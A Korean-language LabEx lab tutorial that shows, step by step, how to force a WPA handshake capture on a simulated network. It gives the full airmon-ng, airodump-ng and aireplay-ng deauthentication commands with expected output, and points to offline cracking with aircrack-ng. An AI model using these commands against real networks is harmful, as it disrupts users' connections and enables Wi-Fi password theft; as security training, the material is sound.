LabEx
로그인무료 가입

aireplay-ng 인증 해제 공격으로 WPA 핸드셰이크 강제하기

Beginner
지금 연습하기

소개

WPA 핸드셰이크 캡처 강제 실습에 오신 것을 환영합니다. WPA/WPA2 4-way 핸드셰이크는 Wi-Fi 네트워크의 비밀번호를 크랙하기 위해 필요한 중요한 데이터입니다. 네트워크에 장치가 연결될 때까지 수동으로 기다려 핸드셰이크를 캡처할 수도 있지만, 이는 시간이 오래 걸릴 수 있습니다.

더 능동적인 접근 방식은 현재 연결된 클라이언트를 강제로 연결 해제한 다음 즉시 다시 연결하도록 하는 것입니다. 이 과정을 인증 해제 (deauthentication 또는 "deauth") 공격이라고 합니다. 클라이언트가 다시 연결될 때 4-way 핸드셰이크를 수행하며, 이를 캡처할 수 있습니다.

이 실습에서는 aircrack-ng 스위트의 강력한 도구인 aireplay-ng를 사용하여 시뮬레이션된 Wi-Fi 클라이언트에 대한 인증 해제 공격을 수행합니다. 이를 통해 분석을 위한 WPA 핸드셰이크를 안정적으로 캡처할 수 있습니다. 저희 실습 환경은 MyTestAP라는 가상 무선 액세스 포인트 (AP) 와 연결된 클라이언트로 미리 구성되어 있습니다.

airodump-ng 스캔에서 연결된 클라이언트 식별

이 단계에서는 무선 인터페이스를 모니터링 모드로 준비한 다음, airodump-ng를 사용하여 대상 액세스 포인트와 연결된 클라이언트를 찾습니다.

먼저 가상 무선 인터페이스 중 하나를 모니터 모드로 전환해야 합니다. 이 모드를 사용하면 인터페이스가 자신에게 오는 트래픽뿐만 아니라 공기 중에 있는 모든 Wi-Fi 트래픽을 캡처할 수 있습니다. 여기서는 wlan1 인터페이스를 사용합니다.

다음 명령을 실행하여 wlan1에서 모니터 모드를 시작합니다.

sudo airmon-ng start wlan1

이 명령은 일반적으로 wlan1mon이라는 새 모니터 인터페이스를 생성합니다. 모드가 활성화되었음을 확인하는 출력이 표시됩니다.

PHY     Interface       Driver          Chipset

phy0    wlan0           mac80211_hwsim  Software simulator
phy1    wlan1           mac80211_hwsim  Software simulator

                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)

이제 새 모니터 인터페이스 (wlan1mon) 에서 airodump-ng를 실행하여 스캔을 시작합니다. -w 플래그를 사용하여 캡처된 패킷을 capture라는 파일에 쓰고, 대상 AP 의 BSSID 와 채널을 지정하여 스캔을 집중합니다. 시뮬레이션된 AP 의 BSSID 는 02:00:00:00:01:00이며 채널 6 에 있습니다.

sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon

airodump-ng를 실행합니다. 실시간으로 업데이트되는 화면이 표시됩니다. 상단에는 주변 액세스 포인트 목록이 표시되고, 하단에는 해당 AP 에 연결된 클라이언트 목록이 표시됩니다. MyTestAP라는 AP 와 해당 AP 에 연결된 클라이언트 하나를 볼 수 있어야 합니다.

출력은 다음과 유사하게 표시됩니다.

CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       10        5    0   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -35    0- 1      0        5

이 출력에서 다음을 식별하고 기록합니다.

  • BSSID: 02:00:00:00:01:00 (AP 의 MAC 주소).
  • STATION: 02:00:00:00:02:00 (연결된 클라이언트의 MAC 주소).

이 터미널을 계속 실행합니다. 나중에 핸드셰이크 캡처를 확인하는 데 필요합니다.

인증 해제 공격을 위한 새 터미널 열기

이 단계에서는 새 터미널 창을 엽니다. 이전 단계의 airodump-ng 명령은 WPA 핸드셰이크를 수신하기 위해 첫 번째 터미널에서 계속 실행되어야 합니다. 인증 해제 공격은 두 번째 별도의 터미널에서 시작됩니다.

새 터미널을 열려면 터미널 창 상단의 터미널 탭 표시줄에 있는 + 아이콘을 클릭합니다.

Open New Terminal

새 터미널이 열리면 ~/project 디렉토리에 있게 되며, 다음 단계에서 공격 명령을 실행할 준비가 됩니다. 공격 자체에 대한 모든 후속 명령은 이 새 터미널에서 실행해야 합니다.

--deauth 를 사용한 aireplay-ng 인증 해제 명령 구성

이 단계에서는 인증 해제 공격을 수행할 aireplay-ng 명령을 구성합니다. 1 단계에서 수집한 정보를 사용합니다.

aireplay-ng를 사용한 인증 해제 공격의 기본 구문은 다음과 같습니다.
aireplay-ng --deauth <패킷 수> -a <AP_BSSID> -c <클라이언트_STATION> <인터페이스>

각 구성 요소를 살펴보겠습니다.

  • --deauth: 이 플래그는 인증 해제 공격 모드를 지정합니다.
  • <패킷 수>: 보낼 인증 해제 패킷의 수입니다. 5와 같이 작은 버스트를 보내는 것으로 클라이언트를 연결 해제하기에 충분합니다.
  • -a <AP_BSSID>: 대상 액세스 포인트의 MAC 주소를 지정합니다. 1 단계에서 이 값은 02:00:00:00:01:00입니다.
  • -c <클라이언트_STATION>: 연결을 끊으려는 클라이언트의 MAC 주소를 지정합니다. 1 단계에서 이 값은 02:00:00:00:02:00입니다.
  • <인터페이스>: 모니터 모드에 있는 무선 인터페이스로, wlan1mon입니다.

이제 새 터미널에서 전체 명령을 조립합니다. 정확히 다음과 같이 표시되어야 합니다.

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

아직 Enter 를 누르지 마십시오. 다음 단계에서 이 명령을 실행합니다.

클라이언트 및 AP 를 대상으로 하는 공격 실행

이 단계에서는 방금 구성한 명령을 실행하여 공격을 시작합니다.

두 번째 터미널 창에서 Enter를 눌러 aireplay-ng 명령을 실행합니다.

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

도구는 즉시 인증 해제 패킷 전송을 시작합니다. 출력에는 시간과 클라이언트로 향하는 인증 해제가 전송되고 있음을 표시합니다.

출력은 다음과 같이 표시됩니다.

10:35:10  Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...

이 공격은 매우 빠릅니다. 명령을 실행하자마자 대상 클라이언트는 네트워크에서 연결이 끊어지고 즉시 다시 연결을 시도합니다. 이 재연결 과정은 우리가 캡처하려는 WPA 핸드셰이크를 생성합니다.

다음 단계에서 결과를 관찰하기 위해 첫 번째 터미널 ( airodump-ng를 실행 중인 터미널) 로 빠르게 전환하십시오.

airodump-ng 창에서 핸드셰이크 캡처 확인

이 단계에서는 airodump-ng 창에서 WPA 핸드셰이크 메시지를 확인하여 인증 해제 공격이 성공했는지 확인합니다.

첫 번째 터미널로 돌아가십시오. 공격이 성공했다면 airodump-ng 디스플레이의 오른쪽 상단에 새 메시지가 표시됩니다.

WPA handshake: 02:00:00:00:01:00

이 메시지는 airodump-ng가 지정된 BSSID 에 대한 4 방향 핸드셰이크를 성공적으로 가로채고 기록했음을 확인합니다.

CH  6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       48       82    1   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -36    0- 1      0       75

이제 핸드셰이크를 얻었으므로 캡처를 중지할 수 있습니다. airodump-ng 터미널에서 Ctrl+C를 눌러 중지합니다.

1 단계에서 -w capture 플래그를 사용했기 때문에 airodump-ng는 현재 디렉토리 (~/project) 의 파일에 캡처된 트래픽을 저장했습니다. 결과를 보려면 파일을 나열하십시오.

ls -l

capture로 시작하는 여러 파일, 특히 capture-01.cap이 표시되어야 합니다. 이 .cap 파일에는 방금 캡처한 WPA 핸드셰이크를 포함한 원시 패킷 데이터가 포함되어 있습니다.

-rw-r--r-- 1 root  root    450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root  root    892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root  root    634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root  root    128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex   121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex    52 Oct 27 10:28 wpa_supplicant.conf

capture-01.cap 파일이 핵심입니다. 이제 이 파일은 aircrack-ng와 같은 암호 크래킹 도구와 함께 사용하여 네트워크의 사전 공유 키를 찾으려고 시도할 수 있습니다.

요약

이 랩을 완료하신 것을 축하드립니다! 인증 해제 공격을 성공적으로 수행하여 WPA 핸드셰이크를 강제로 캡처했습니다.

이 랩에서는 다음을 배웠습니다.

  • airmon-ng를 사용하여 무선 인터페이스를 모니터 모드로 전환하는 방법.
  • airodump-ng를 사용하여 대상 AP 및 클라이언트를 스캔하고 식별하는 방법.
  • aireplay-ng를 사용하여 인증 해제 공격을 구성하고 실행하는 방법.
  • WPA 핸드셰이크 캡처를 확인하고 결과 .cap 파일을 찾는 방법.

이것은 무선 네트워크 보안 테스트의 기본적인 기술입니다. 캡처된 핸드셰이크 파일은 다음 단계의 핵심 요소입니다. 즉, aircrack-ng와 같은 도구와 포괄적인 단어 목록을 사용하여 오프라인 암호 크래킹을 수행하는 것입니다.